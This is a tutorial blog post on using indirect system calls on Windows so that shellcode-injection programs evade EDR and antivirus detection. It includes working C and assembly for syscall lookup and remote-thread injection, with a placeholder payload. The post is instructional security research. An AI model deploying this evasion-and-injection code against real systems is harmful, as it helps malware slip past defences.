Page cover image

Indirect System Calls

September 12th, 2023

Table of Contents

Prerequisites

This blog post (although considerably shorter than my previous posts) assumes extreme familiarity with WinAPI/NTAPI and you should've implemented a program that uses direct syscalls to perform shellcode/DLL injection by now. If you haven't, read the previous blog posts and get up to speed (don't worry, we'll wait for you to finish).

Direct System Calls

Overview

We've come a pretty far way in our process injection journey. Starting from the very basic WinAPI shellcode/DLL injections all the way to direct syscalls! Give yourselves a huge pat on the back for making it this far - you're also a certified nerd at this point. In this post, we'll go over what indirect syscalls are and why you'd want to use these over direct syscalls. A huge shoutout to VirtualAllocEx, aka Daniel Feichter from RedOps and his blog post on direct/indirect syscalls.

The Problem With Direct Syscalls

By in large, the biggest issue with using direct syscalls for our purposes of injecting something malicious into a process - whether we're injecting shellcode or a library, is the fact that our program directly invoking a syscall within itself is highly unnatural and suspicious as hell. Think about it, why would a normal-unassuming program need to issue a syscall directly unless it was up to no good? Sure, you could make a few case points in which it's actually done or sometimes needed, but those cases are few and far between. The point is that an EDR/AV, which is already on high alert, observing a program's execution go from itself to invoking a syscall (which is only typically done within ntdll.dll) immediately is very suspicious and sure to raise a couple of alarms. Using direct syscalls, our program flow looks something like the following:

System calls are typically executed in ntdll.dll. To have our program invoke a syscall without the syscall coming from ntdll.dll is very suspicious and places extra/unwanted scrutiny on our program. Indirect syscalls attempt to remedy this by jumping to a syscall instruction located inside of ntdll.dll.

As you can see from the picture above, this progression from our humble little program all the way to where we invoke a syscall from ntdll.dll is a very strange path for our program to be taking indeed. If we see the image below, we can see what's typically expected for a program to trek through before it ever invokes a syscall:

See? Never once within the program is a syscall invoked directly through it, it jumps through many modules before landing inside of ntdll.dll and then performing a syscall instruction. So, how might we go about making our program mimic this expected flow path?

Introducing Indirect Syscalls

To combat the issue that direct syscalls bring, the way we can make our program seem more "legitimate" and not have it stick out as much is with the following: Instead of executing a syscall instruction directly in our assembly function stubs, we can instead replace the syscall instruction with the address of a legitimate syscall elsewhere in ntdl.dll. Observe the following images to see what I mean by this:

This is what we've been doing up to this point. We move the syscall number into the eax register before invoking a syscall instruction. What we want to be doing with indirect syscalls is replacing the syscall instruction with something like the following:

You can see that when we reach the syscall instruction, where it once stood now stands a jmp qword ptr [NtOpenProcessSyscall]. So, when the execution gets to this point, it will jump to the address of a legitimate syscall instruction within ntdll.dll instead of us executing it directly. Hence, "indirect syscalls" since we're indirectly invoking a syscall instruction.

You don't have to set the addresses of the syscall instructions to be ones that are specifically meant for your function - for example, finding a syscall belonging to NtOpenProcess in your NtOpenProcess stub. Any syscall address, as long as it's valid and actually exists, will end up working.

Here's an example of indirect syscalls using the same syscall instruction address just as a proof-of-concept:

Debugger Insights

Just to drive the point home, let's set a breakpoint on the syscall instruction when we do a typical direct syscalls example, and then compare what happens to the execution flow when we do an indirect syscalls example. Don't worry about the code for now, we'll cover how to program this out in the implementations section of the blog. For now, just observe:

If we step a single instruction forward, we'll see that our program will invoke the syscall and then go to ret:

And, that's it! That's why we're calling it "direct syscalls" because we invoke a syscall instruction directly as seen above. Now, let's see what happens if we replace this syscall instruction with the address of a legitimate syscall somewhere in ntdll.dll, we'll immediately see a difference.

Now, if we step into this we'll see something incredible. Instead of invoking the syscall instruction directly, we jump to the location of the syscall instruction located in the NtOpenProcess stub in ntdll.dll:

It's important to note that just performing indirect syscalls might not be enough either. In terms of OPSEC, we haven't done anything to our programs to make them stealthier (this includes all the previous blog posts). We haven't incorporated API Hashing, custom GetProcAddress/GetModuleHandle, etc. So, with this being said, it's important to note that we're just covering the basic principles of these attacks - OPSEC implementations are left for you to go and try.

Implementation

Luckily, most of the code is freshly cooked copypasta (🍝) from our previous direct syscalls blog. The only thing we need to implement is a way to search for the address of the syscall instructions. If we recall from our dynamic SSN-seeking function:

DWORD GetSSN(
    IN HMODULE hNTDLL, 
    IN LPCSTR NtFunction
) {

    DWORD NtFunctionSSN = NULL;
    UINT_PTR NtFunctionAddress = NULL;

    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == NULL) {
        warn("[GetProcAddress] failed to get the address of %s, error: 0x%lx", NtFunction, GetLastError());
        return NULL;
    }

    okay("got the address of %s!", NtFunction);
    info("getting SSN of %s...", NtFunction);
    NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    okay("\\___[\n\t| %s\n\t| 0x%p+0x4\n\t|____________________0x%lx]\n", NtFunction, NtFunctionAddress, NtFunctionSSN);
    return NtFunctionSSN;

}

The way we were retrieving the SSN number of a potential NTAPI function was by reading the value at the offset 0x4 in the assembly stub of said function.

NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];

We can implement the same logic behind getting the syscall number to get the address of a syscall instruction. If we look at a typical syscall stub, we'll see that the syscall instruction sits at an offset of 0x12:

We can also see that a syscall instruction is comprised of the following two opcodes: 0x0f, 0x05. Knowing this, we can read the address at the 0x12 offset and confirm that these two opcodes are present indicating that we've landed at a valid syscall instruction/address. The finished function looks like the following:

VOID IndirectPrelude(
    IN HMODULE hNTDLL,
    IN LPCSTR NtFunction,
    OUT DWORD* SSN,
    OUT UINT_PTR* Syscall
) {
    
    UINT_PTR NtFunctionAddress = NULL;
    BYTE SyscallOpcode[2]      = {0x0F, 0x05};

    info("beginning indirect prelude...");
    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == NULL) {
        warn("[GetProcAddress] failed, error: 0x%lx", GetLastError());
        return NULL;
    }

    okay("got the address of %s! (0x%p)", NtFunction, NtFunctionAddress);
    *SSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    *Syscall = NtFunctionAddress + 0x12;

    if (memcmp(SyscallOpcode, *Syscall, sizeof(SyscallOpcode)) == 0) {
        okay("syscall signature (0x0F, 0x05) matched, found a valid syscall instruction!");
    }
    else {
        warn("expected syscall signature: 0x0f,0x05 didn't match.");
        return NULL;
    }
    
    okay("got the SSN of %s (0x%lx)", NtFunction, *SSN);
    printf("\n\t| %s ", NtFunction);
    printf("\n\t|\n\t| ADDRESS\t| 0x%p\n\t| SYSCALL\t| 0x%p\n\t| SSN\t\t| 0x%lx\n\t|____________________________________\n\n", NtFunctionAddress, *Syscall, *SSN);

}

The code works beautifully but again, I'm sure this function can be made much better. You're urged to make this more efficient and fix my ape-brained hacky code. So, go ahead, break my heart :'(

With this function created, we can now use it to populate a new variable that we'll need in order to house the address(es) of the syscall instructions:

#include "glassBox.h"

DWORD NtCloseSSN;
DWORD NtOpenProcessSSN;
DWORD NtCreateThreadExSSN;
DWORD NtWriteVirtualMemorySSN;
DWORD NtWaitForSingleObjectSSN;
DWORD NtAllocateVirtualMemorySSN;

UINT_PTR NtCloseSyscall;
UINT_PTR NtOpenProcessSyscall;
UINT_PTR NtCreateThreadExSyscall;
UINT_PTR NtWriteVirtualMemorySyscall;
UINT_PTR NtWaitForSingleObjectSyscall;
UINT_PTR NtAllocateVirtualMemorySyscall;

[...]

Please note, as we've covered already, you can 100% use one (1) syscall instruction address for all of your syscall stubs, I'm just doing it like this for the sake of completeness.

Now, in our syscalls.asm file, we can add in the following:

.data

EXTERN NtOpenProcessSSN:DWORD          
EXTERN NtOpenProcessSyscall:QWORD

EXTERN NtAllocateVirtualMemorySSN:DWORD
EXTERN NtAllocateVirtualMemorySyscall:QWORD

EXTERN NtWriteVirtualMemorySSN:DWORD
EXTERN NtWriteVirtualMemorySyscall:QWORD  

EXTERN NtWaitForSingleObjectSSN:DWORD
EXTERN NtWaitForSingleObjectSyscall:QWORD  

EXTERN NtCreateThreadExSSN:DWORD       
EXTERN NtCreateThreadExSyscall:QWORD 

EXTERN NtCloseSSN:DWORD
EXTERN NtCloseSyscall:QWORD

.code

NtOpenProcess proc
		mov r10, rcx
		mov eax, NtOpenProcessSSN       
		jmp qword ptr [NtOpenProcessSyscall]
		ret                             
NtOpenProcess endp

[...]

After doing this, all we need to do is call our IndirectPrelude function to populate these variables in order to get them ready for use, this is made super easy as well with our function:

[...]

int main(int argc, char** argv) {
    
    DWORD    PID      = 0;
    HMODULE  hNTDLL   = NULL;
    NTSTATUS STATUS   = NULL;
    PVOID    rBuffer  = NULL;
    HANDLE   hThread  = NULL;
    HANDLE   hProcess = NULL;

    const UCHAR crowPuke[] = { 0xDE, 0xAD, 0xBE, 0xEF };
    
    SIZE_T crowPukeSize = sizeof(crowPuke);
    SIZE_T bytesWritten = 0;
    
  if (argc < 2) {
      warn("usage: %s <process>", argv[0]);
      return EXIT_FAILURE;
  }

  PID = atoi(argv[1]);
  CLIENT_ID CID = { (HANDLE)PID, 0 };
  OBJECT_ATTRIBUTES OA = { sizeof(OA), 0 };

  hNTDLL = GetMod(L"NTDLL");
  IndirectPrelude(hNTDLL, "NtOpenProcess", &NtOpenProcessSSN, &NtOpenProcessSyscall);
  IndirectPrelude(hNTDLL, "NtAllocateVirtualMemory", &NtAllocateVirtualMemorySSN, &NtAllocateVirtualMemorySyscall);
  IndirectPrelude(hNTDLL, "NtWriteVirtualMemory", &NtWriteVirtualMemorySSN, &NtWriteVirtualMemorySyscall);
  IndirectPrelude(hNTDLL, "NtCreateThreadEx", &NtCreateThreadExSSN, &NtCreateThreadExSyscall);
  IndirectPrelude(hNTDLL, "NtWaitForSingleObject", &NtWaitForSingleObjectSSN, &NtWaitForSingleObjectSyscall);
  IndirectPrelude(hNTDLL, "NtClose", &NtCloseSSN, &NtCloseSyscall);

  okay("indirect prelude finished! beginning injection");
  info("getting a handle on the process (%ld)...", PID);

[...]

After all of this, we can finally compile this and run it!

And there we have it! Indirect syscalls demystified! What we've effectively done is the following:

You can find the code from this post in the GitHub repository or in the attached files below:

Anyway, that's all for now. See ya.

References

Last updated